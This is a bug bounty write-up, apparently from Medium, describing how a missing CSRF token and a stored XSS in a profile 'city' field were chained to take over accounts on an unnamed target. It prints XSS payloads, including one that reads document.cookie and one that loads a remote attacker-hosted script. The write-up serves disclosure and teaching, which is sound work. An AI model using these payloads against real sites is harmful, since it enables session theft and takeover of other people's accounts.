CSRF + Stored XSS Leading to Full Account Takeover

This write-up is about my findings of CSRF + XSS and using them both to get a full account takeover. Wish u like it ❤
We always see write-ups / images like this showing the CSRF vs. XSS, But have u ever think to use them together?

Hi boyz, This is my first write-up so excuse me if there were any mistakes or missing of smth..My name is Fares Walid and i am recent full time bug bounty hunter, python/go coder, and interested in Malware Too xDD
This write-up is about my finding in a priv8 program on hackerone, I was able to find:
1. CSRF
2. XSS
3. XSS + CSRF = Account Takeover
I hate time wasting, So let’s start by calling the affected site as: target.com

At first I started opening the website and registered a new user and tested some functions here and there, then one of the most important and lovley parts to test for me, It’s time now for “Account Info/Setting” Section.

First i started to check the changing of some details and inspecting the requests, then i noticed that there are no headers controlling anything or CSRF tokens or any security level!

Quickly I generated a CSRF PoC and tested it:

  1. Then i was able to get the **CSRF** !!

Now I started to try to change the password! and i was really happy cuz i didn’t see any requires for the current password!! it’s just requiring the password+confirm password and it’s changed!

I tried to use my CSRF to change the password too!
But I faced smth not good here ..
There was a csrf token used in change password request.

Now i started to test the other inputs and trying to get an XSS!
Then here, I noticed something weird when i tried to but “ ‘ ( ) < > and other chars in the inputs !!
But What was it? After i set the city to: **mango”’>**
I noticed the following!

I tried to set the city to: mango”><script>alert(document.cookie)</script>
That’s so ez, no encoding nothing protecting the requests, here we go.

2. Now i got the XSS with the first CSRF!! What’s it now?

What’s it now? I’ve created a quick js code and uploaded it on my website, then used mango”><script src=”my_js_file_url”></script> as a payload!!

What was the file containing?

And boom, Im fully controlling the account now.

Wish you like this write-up, as soon as i get smth interesting to write about it, im gonna share it :D
Have fun and keep digging ❤

My Twitter

My Github

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store